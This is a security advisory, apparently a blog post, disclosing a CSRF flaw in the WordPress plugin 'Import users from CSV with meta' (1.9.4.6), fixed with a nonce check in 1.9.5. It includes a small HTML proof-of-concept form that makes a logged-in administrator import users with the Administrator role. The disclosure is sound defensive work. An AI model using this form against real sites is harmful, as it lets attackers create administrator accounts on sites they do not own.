02 Sep

Cross-Site Request Forgery (CSRF)/User Import Vulnerability in Import users from CSV with meta

Recently we have been taking a quick look over plugins that handle importing users into WordPress for security issues, since their functionality could be useful to hackers.

In looking over the Import Vulnerability in Import users from CSV with meta plugin we found that as version 1.9.4.6 the plugin did not include protection against cross-site request forgery (CSRF) for requests to imports users. So if you could get a logged in administrator to access a page you control you could cause them to create new users with the Administrator role that they can then access.

The import is handled through the page /wp-admin/tools.php?page=acui, which is set up with the following line of code in the file /import-users-from-csv-with-meta/trunk/import-users-from-csv-with-meta.php:

94
add_submenu_page( 'tools.php', 'Insert users massively (CSV)', 'Import users from CSV', 'create_users', 'acui', 'acui_options' );

That calls the function acui_options() in the file /importer.php to generate the page. The user import is handled through the function acui_fileupload_process(). The code before that happens in the function checks if the user can “create_users” (which is normally a capability that Administrators have), but didn’t check for a nonce as of version 1.9.4.6:

428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
function acui_options() 
{
	global $url_plugin;
 
	if ( !current_user_can('create_users') ) {
		wp_die(__('You are not allowed to see this content.'));
	}
 
	if ( isset ( $_GET['tab'] ) ) 
		$tab = $_GET['tab'];
   	else 
   		$tab = 'homepage';
 
 
	if( isset( $_POST ) && !empty( $_POST ) ):
		switch ( $tab ){
      		case 'homepage':
      			acui_fileupload_process( $_POST, false );

The function acui_fileupload_process() also doesn’t check for a nonce.

After we notified the developer of the issue, version 1.9.5 was released, which adds a nonce to the relevant page and checks to make sure a valid one is included when importing users:

229
230
231
232
function acui_fileupload_process( $form_data, $is_cron = false ) {
  if ( ! isset( $_POST['acui-nonce'] ) || ! wp_verify_nonce( $_POST['acui-nonce'], 'acui-import' ) ) {
        wp_die( 'Nonce problem' );
  }

Proof of Concept

The following proof of concept will cause users included in the uploaded CSV file to be added as Administrators, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress. The plugin comes with sample CSV file name test.csv, which can be used when testing the proof of concept.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=acui" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role[]" value="administrator" />
<input type="file" name="uploadfiles[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 8/22/2016 – Developer notified.
  • 8/30/2016 – Version 1.9.5 released, which fixes the issue.

Leave a Reply

Your email address will not be published. Required fields are marked *